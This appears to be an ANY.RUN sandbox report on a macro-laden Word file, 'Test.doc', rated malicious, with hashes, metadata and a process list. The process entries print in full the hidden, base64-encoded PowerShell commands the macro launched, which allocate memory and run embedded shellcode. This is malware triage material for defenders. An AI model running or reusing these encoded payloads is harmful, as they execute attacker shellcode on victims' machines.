File name:

Test.doc

Full analysis: https://app.any.run/tasks/f3ac02b6-3050-455d-a390-3c20266ffdf3
Verdict: Malicious activity
Analysis date: October 06, 2018, 02:32:57
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Aaron Truax, Template: Single spaced (blank).dotx, Last Saved By: Aaron Truax, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Sat Oct 6 03:30:00 2018, Last Saved Time/Date: Sat Oct 6 03:32:00 2018, Number of Pages: 1, Number of Words: 1, Number of Characters: 6, Security: 0
MD5:

58AEDDCF5DC0F0CAC3A7304522D445F8

SHA1:

C7587DF7B1737B0FD92444917E69A938EEDE04E0

SHA256:

9CC441324D1D224985C4F76C9EF04959982D419AF2C6B0251E527CA62499B2C0

SSDEEP:

768:T5IoK/qNavxz5vxzgQcP3NGkfqM7Pl1XajoNe+deBtam4IvUEXOPPnjiCcVnUirj:T5IVqNavjpouViCwNtFDQkAB8Q2eakG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2108)

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2108)

  • SUSPICIOUS

    • Executes PowerShell scripts

      • powershell.exe (PID: 3828)

    • Creates files in the user directory

      • powershell.exe (PID: 3828)
      • powershell.exe (PID: 1320)
      • notepad++.exe (PID: 1796)

    • Application launched itself

      • powershell.exe (PID: 3828)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2108)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2108)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (35.9)
.xls | Microsoft Excel sheet (33.7)
.doc | Microsoft Word document (old ver.) (21.3)

EXIF

FlashPix

Title: -
Subject: -
Author: Aaron Truax
Keywords: -
Comments: -
Template: Single spaced (blank).dotx
LastModifiedBy: Aaron Truax
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: 2.0 minutes
CreateDate: 2018:10:06 02:30:00
ModifyDate: 2018:10:06 02:32:00
Pages: 1
Words: 1
Characters: 6
Security: None
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 6
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CodePage: Windows Latin 1 (Western European)
InternalTags: -
ContentTypeId: 0x0101006EDDDB5EE6D98C44930B742096920B300400F5B6D36B3EF94B4E9A635CDF2A18F5B8
FeatureTags: -
LocalizationTags: -
CampaignTags: -
ScenarioTags: -
LocLastLocAttemptVersionTypeLookup: -
MarketSpecific: -
ApprovalStatus: InProgress
LocComments: -
DirectSourceMarket: -
LocPublishedLinkedAssetsLookup: -
ThumbnailAssetId: -
PrimaryImageGen: 1
LegacyData: -
LocNewPublishedVersionLookup: -
NumericId: 102787001
TPFriendlyName: -
LocOverallPublishStatusLookup: -
LocRecommendedHandoff: -
BlockPublish: -
BusinessGroup: -
OpenTemplate: 1
SourceTitle: -
LocOverallLocStatusLookup: -
APEditor: -
UALocComments: -
IntlLangReviewDate: -
PublishStatusLookup: 1343188;#
ParentAssetId: -
FeatureTagsTaxHTField0: -
MachineTranslated: -
Providers: -
OriginalSourceMarket: -
APDescription: -
ContentItem: -
ClipArtFilename: -
TPInstallLocation: -
TimesCloned: -
PublishTargets: OfficeOnlineVNext
AcquiredFrom: Internal MS
AssetStart: 2011-11-23T11:29:00Z
FriendlyTitle: -
Provider: -
LastHandOff: -
TPClientViewer: -
TemplateStatus: Complete
Downloads: -
OOCacheId: -
IsDeleted: -
LocPublishedDependentAssetsLookup: -
AssetExpire: 2029-05-12T02:00:00Z
CSXSubmissionMarket: -
DSATActionTaken: -
SubmitterId: -
EditorialTags: -
TPExecutable: -
CSXSubmissionDate: -
CSXUpdate: -
AssetType: TP
ApprovalLog: -
BugNumber: -
OriginAsset: -
TPComponent: -
Milestone: -
RecommendationsModifier: -
AssetId: TP102787001
PolicheckWords: -
TPLaunchHelpLink: -
IntlLocPriority: -
TPApplication: -
IntlLangReviewer: -
HandoffToMSDN: -
PlannedPubDate: -
CrawlForDependencies: -
LocLastLocAttemptVersionLookup: 693888
LocProcessedForHandoffsLookup: -
TrustLevel: 1 Microsoft Managed Content
CampaignTagsTaxHTField0: -
TPNamespace: -
LocOverallPreviewStatusLookup: -
TaxCatchAll: -
IsSearchable: -
TemplateTemplateType: Word Document Template
Markets: -
IntlLangReview: -
UAProjectedTotalWords: -
OutputCachingOn: -
AverageRating: -
LocMarketGroupTiers2: -
APAuthor: 978;#REDMOND\v-namall
TPCommandLine: -
LocManualTestRequired: -
TPAppVersion: -
EditorialStatus: Complete
LocProcessedForMarketsLookup: -
LastModifiedDateTime: -
TPLaunchHelpLinkType: Template
ScenarioTagsTaxHTField0: -
OriginalRelease: 14
LocalizationTagsTaxHTField0: -
Manager: -
UALocRecommendation: Localize
LocOverallHandbackStatusLookup: -
ArtSampleDocs: -
UACurrentWords: -
ShowIn: Show everywhere
CSXHash: -
VoteCount: -
InternalTagsTaxHTField0: -
UANotes: -
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
51
Monitored processes
10
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe no specs powershell.exe csc.exe cvtres.exe no specs explorer.exe no specs notepad++.exe gup.exe hh.exe no specs hh.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
120"C:\Windows\hh.exe" C:\Windows\hh.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® HTML Help Executable
Exit code:
4294967295
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\hh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\hhctrl.ocx
c:\windows\system32\user32.dll
1320"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABCAG0AdAAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEIAbQB0ACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAYQAsADAAeABmADcALAAwAHgAYwA2ACwAMAB4ADQAZQAsADAAeAAwADMALAAwAHgAZAA5ACwAMAB4AGUAYgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAAzADEALAAwAHgANQAwACwAMAB4ADEAMwAsADAAeAAwADMALAAwAHgANQAwACwAMAB4ADEAMwAsADAAeAA4ADMALAAwAHgAZQA4ACwAMAB4ADAAYgAsADAAeAAyADQALAAwAHgAYgBiACwAMAB4AGYAZgAsADAAeAAxAGIALAAwAHgAMgBiACwAMAB4ADQANAAsADAAeAAwADAALAAwAHgAZABiACwAMAB4ADQAYwAsADAAeABjAGMALAAwAHgAZQA1ACwAMAB4AGUAYQAsADAAeAA0AGMALAAwAHgAYQBhACwAMAB4ADYAZQAsADAAeAA1AGMALAAwAHgANwBkACwAMAB4AGIAOAAsADAAeAAyADMALAAwAHgANQAwACwAMAB4AGYANgAsADAAeABlAGMALAAwAHgAZAA3ACwAMAB4AGUAMwAsADAAeAA3AGEALAAwAHgAMwA5ACwAMAB4AGQANwAsADAAeAA0ADQALAAwAHgAMwAwACwAMAB4ADEAZgAsADAAeABkADYALAAwAHgANQA1ACwAMAB4ADYAOQAsADAAeAA2ADMALAAwAHgANwA5ACwAMAB4AGQANQAsADAAeAA3ADAALAAwAHgAYgAwACwAMAB4ADUAOQAsADAAeABlADQALAAwAHgAYgBhACwAMAB4AGMANQAsADAAeAA5ADgALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAAyADQALAAwAHgAYwA4ACwAMAB4AGYAYQAsADAAeABhAGMALAAwAHgAOQBiACwAMAB4AGYAZAAsADAAeAA4AGYALAAwAHgAZgA5ACwAMAB4ADIANwAsADAAeAA3ADUALAAwAHgAYwAzACwAMAB4AGUAYwAsADAAeAAyAGYALAAwAHgANgBhACwAMAB4ADkAMwAsADAAeAAwAGYALAAwAHgAMAAxACwAMAB4ADMAZAAsADAAeABhADgALAAwAHgANAA5ACwAMAB4ADgAMQAsADAAeABiAGYALAAwAHgANwBkACwAMAB4AGUAMgAsADAAeAA4ADgALAAwAHgAYQA3ACwAMAB4ADYAMgAsADAAeABjAGYALAAwAHgANAAzACwAMAB4ADUAMwAsADAAeAA1ADAALAAwAHgAYgBiACwAMAB4ADUANQAsADAAeABiADUALAAwAHgAYQA5ACwAMAB4ADQANAAsADAAeABmADkALAAwAHgAZgA4ACwAMAB4ADAANgAsADAAeABiADcALAAwAHgAMAAzACwAMAB4ADMAYwAsADAAeABhADAALAAwAHgAMgA4ACwAMAB4ADcANgAsADAAeAAzADQALAAwAHgAZAAzACwAMAB4AGQANQAsADAAeAA4ADEALAAwAHgAOAAzACwAMAB4AGEAZQAsADAAeAAwADEALAAwAHgAMAA3ACwAMAB4ADEAMAAsADAAeAAwADgALAAwAHgAYwAxACwAMAB4AGIAZgAsADAAeABmAGMALAAwAHgAYQA5ACwAMAB4ADAANgAsADAAeAA1ADkALAAwAHgANwA2ACwAMAB4AGEANQAsADAAeABlADMALAAwAHgAMgBkACwAMAB4AGQAMAAsADAAeABhADkALAAwAHgAZgAyACwAMAB4AGUAMgAsADAAeAA2AGEALAAwAHgAZAA1ACwAMAB4ADcAZgAsADAAeAAwADUALAAwAHgAYgBkACwAMAB4ADUAYwAsADAAeAAzAGIALAAwAHgAMgAyACwAMAB4ADEAOQAsADAAeAAwADUALAAwAHgAOQBmACwAMAB4ADQAYgAsADAAeAAzADgALAAwAHgAZQAzACwAMAB4ADQAZQAsADAAeAA3ADMALAAwAHgANQBhACwAMAB4ADQAYwAsADAAeAAyAGUALAAwAHgAZAAxACwAMAB4ADEAMAAsADAAeAA2ADAALAAwAHgAMwBiACwAMAB4ADYAOAAsADAAeAA3AGIALAAwAHgAZQBjACwAMAB4ADgAOAAsADAAeAA0ADEALAAwAHgAOAA0ACwAMAB4AGUAYwAsADAAeAA4ADYALAAwAHgAZAAyACwAMAB4AGYANwAsADAAeABkAGUALAAwAHgAMAA5ACwAMAB4ADQAOQAsADAAeAA5ADAALAAwAHgANQAyACwAMAB4AGMAMQAsADAAeAA1ADcALAAwAHgANgA3ACwAMAB4ADkANQAsADAAeABmADgALAAwAHgAMgAwACwAMAB4AGYANwAsADAAeAA2ADgALAAwAHgAMAAzACwAMAB4ADUAMQAsADAAeABkADEALAAwAHgAYQBlACwAMAB4ADUANwAsADAAeAAwADEALAAwAHgANAA5ACwAMAB4ADAANwAsADAAeABkADgALAAwAHgAYwBhACwAMAB4ADgAOQAsADAAeABhADgALAAwAHgAMABkACwAMAB4ADYANgAsADAAeAA4AGYALAAwAHgAMwBlACwAMAB4ADYAZQAsADAAeABkAGYALAAwAHgAOAA1ACwAMAB4AGEAYwAsADAAeAAwADYALAAwAHgAMgAyACwAMAB4ADkAYQAsADAAeABjADUALAAwAHgANgA1ACwAMAB4AGEAYgAsADAAeAA3AGMALAAwAHgAYgA1ACwAMAB4AGQAOQAsADAAeABmAGMALAAwAHgAZAAwACwAMAB4ADcANQAsADAAeAA4AGEALAAwAHgAYgBjACwAMAB4ADgAMAAsADAAeAAxAGQALAAwAHgAYwAwACwAMAB4ADMAMgAsADAAeABmAGUALAAwAHgAMwBkACwAMAB4AGUAYgAsADAAeAA5ADgALAAwAHgAOQA3ACwAMAB4AGQANwAsADAAeAAwADQALAAwAHgANwA1ACwAMAB4AGMAZgAsADAAeAA0AGYALAAwAHgAYgBjACwAMAB4AGQAYwAsADAAeAA5AGIALAAwAHgAZQBlACwAMAB4ADQAMQAsADAAeABjAGIALAAwAHgAZQAxACwAMAB4ADMAMAAsADAAeABjADkALAAwAHgAZgA4ACwAMAB4ADEANgAsADAAeABmAGUALAAwAHgAMwBhACwAMAB4ADcANAAsADAAeAAwADUALAAwAHgAOQA2ACwAMAB4AGMAYQAsADAAeABjADMALAAwAHgANwA3ACwAMAB4ADMAMAAsADAAeABkADQALAAwAHgAZgA5ACwAMAB4ADEAMgAsADAAeABiAGMALAAwAHgANAAwACwAMAB4ADAANgAsADAAeABiADUALAAwAHgAZQBiACwAMAB4AGYAYwAsADAAeAAwADQALAAwAHgAZQAwACwAMAB4AGQAYgAsADAAeABhADIALAAwAHgAZgA3ACwAMAB4AGMANwAsADAAeAA1ADAALAAwAHgANgBhACwAMAB4ADYAMgAsADAAeABhADgALAAwAHgAMABlACwAMAB4ADkAMwAsADAAeAA2ADIALAAwAHgAMgA4ACwAMAB4AGMAZQAsADAAeABjADUALAAwAHgAZQA4ACwAMAB4ADIAOAAsADAAeABhADYALAAwAHgAYgAxACwAMAB4ADQAOAAsADAAeAA3AGIALAAwAHgAZAAzACwAMAB4AGIAZAAsADAAeAA0ADQALAAwAHgAZQBmACwAMAB4ADQAOAAsADAAeAAyADgALAAwAHgANgA3ACwAMAB4ADQANgAsADAAeAAzAGQALAAwAHgAZgBiACwAMAB4ADAAZgAsADAAeAA2ADQALAAwAHgAMQA4ACwAMAB4AGMAYgAsADAAeAA4AGYALAAwAHgAOQA3ACwAMAB4ADQAZgAsADAAeABjAGQALAAwAHgAZQBjACwAMAB4ADQAMQAsADAAeABhADkALAAwAHgAYgBiACwAMAB4ADEAYwAsADAAeAA1ADIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEMAdwBoAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABDAHcAaAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAQwB3AGgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1480"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\explorer.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
1684C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES25F8.tmp" "c:\Users\admin\AppData\Local\Temp\CSC25F7.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cryptsp.dll
1796"C:\Program Files\Notepad++\notepad++.exe" "C:\Users\admin\AppData\Local\Temp\~DFA937A8377C880326.TMP"C:\Program Files\Notepad++\notepad++.exe
explorer.exe
User:
admin
Company:
Don HO don.h@free.fr
Integrity Level:
MEDIUM
Description:
Notepad++ : a free (GNU) source code editor
Exit code:
0
Version:
7.51
Modules
Images
c:\program files\notepad++\notepad++.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2108"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Test.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
2992"C:\Windows\hh.exe" C:\Windows\hh.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® HTML Help Executable
Exit code:
4294967295
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\hh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\hhctrl.ocx
c:\windows\system32\user32.dll
3748"C:\Program Files\Notepad++\updater\gup.exe" -v7.51C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe
User:
admin
Company:
Don HO don.h@free.fr
Integrity Level:
MEDIUM
Description:
GUP : a free (LGPL) Generic Updater
Exit code:
0
Version:
4.1
Modules
Images
c:\program files\notepad++\updater\gup.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\notepad++\updater\libcurl.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wldap32.dll
3828powershell.exe -window hidden -e JABHADgAdAAgAD0AIAAnACQAQgBtAHQAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAQgBtAHQAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBhACwAMAB4AGYANwAsADAAeABjADYALAAwAHgANABlACwAMAB4ADAAMwAsADAAeABkADkALAAwAHgAZQBiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA1ADAALAAwAHgAMQAzACwAMAB4ADAAMwAsADAAeAA1ADAALAAwAHgAMQAzACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgAMABiACwAMAB4ADIANAAsADAAeABiAGIALAAwAHgAZgBmACwAMAB4ADEAYgAsADAAeAAyAGIALAAwAHgANAA0ACwAMAB4ADAAMAAsADAAeABkAGIALAAwAHgANABjACwAMAB4AGMAYwAsADAAeABlADUALAAwAHgAZQBhACwAMAB4ADQAYwAsADAAeABhAGEALAAwAHgANgBlACwAMAB4ADUAYwAsADAAeAA3AGQALAAwAHgAYgA4ACwAMAB4ADIAMwAsADAAeAA1ADAALAAwAHgAZgA2ACwAMAB4AGUAYwAsADAAeABkADcALAAwAHgAZQAzACwAMAB4ADcAYQAsADAAeAAzADkALAAwAHgAZAA3ACwAMAB4ADQANAAsADAAeAAzADAALAAwAHgAMQBmACwAMAB4AGQANgAsADAAeAA1ADUALAAwAHgANgA5ACwAMAB4ADYAMwAsADAAeAA3ADkALAAwAHgAZAA1ACwAMAB4ADcAMAAsADAAeABiADAALAAwAHgANQA5ACwAMAB4AGUANAAsADAAeABiAGEALAAwAHgAYwA1ACwAMAB4ADkAOAAsADAAeAAyADEALAAwAHgAYQA2ACwAMAB4ADIANAAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGEAYwAsADAAeAA5AGIALAAwAHgAZgBkACwAMAB4ADgAZgAsADAAeABmADkALAAwAHgAMgA3ACwAMAB4ADcANQAsADAAeABjADMALAAwAHgAZQBjACwAMAB4ADIAZgAsADAAeAA2AGEALAAwAHgAOQAzACwAMAB4ADAAZgAsADAAeAAwADEALAAwAHgAMwBkACwAMAB4AGEAOAAsADAAeAA0ADkALAAwAHgAOAAxACwAMAB4AGIAZgAsADAAeAA3AGQALAAwAHgAZQAyACwAMAB4ADgAOAAsADAAeABhADcALAAwAHgANgAyACwAMAB4AGMAZgAsADAAeAA0ADMALAAwAHgANQAzACwAMAB4ADUAMAAsADAAeABiAGIALAAwAHgANQA1ACwAMAB4AGIANQAsADAAeABhADkALAAwAHgANAA0ACwAMAB4AGYAOQAsADAAeABmADgALAAwAHgAMAA2ACwAMAB4AGIANwAsADAAeAAwADMALAAwAHgAMwBjACwAMAB4AGEAMAAsADAAeAAyADgALAAwAHgANwA2ACwAMAB4ADMANAAsADAAeABkADMALAAwAHgAZAA1ACwAMAB4ADgAMQAsADAAeAA4ADMALAAwAHgAYQBlACwAMAB4ADAAMQAsADAAeAAwADcALAAwAHgAMQAwACwAMAB4ADAAOAAsADAAeABjADEALAAwAHgAYgBmACwAMAB4AGYAYwAsADAAeABhADkALAAwAHgAMAA2ACwAMAB4ADUAOQAsADAAeAA3ADYALAAwAHgAYQA1ACwAMAB4AGUAMwAsADAAeAAyAGQALAAwAHgAZAAwACwAMAB4AGEAOQAsADAAeABmADIALAAwAHgAZQAyACwAMAB4ADYAYQAsADAAeABkADUALAAwAHgANwBmACwAMAB4ADAANQAsADAAeABiAGQALAAwAHgANQBjACwAMAB4ADMAYgAsADAAeAAyADIALAAwAHgAMQA5ACwAMAB4ADAANQAsADAAeAA5AGYALAAwA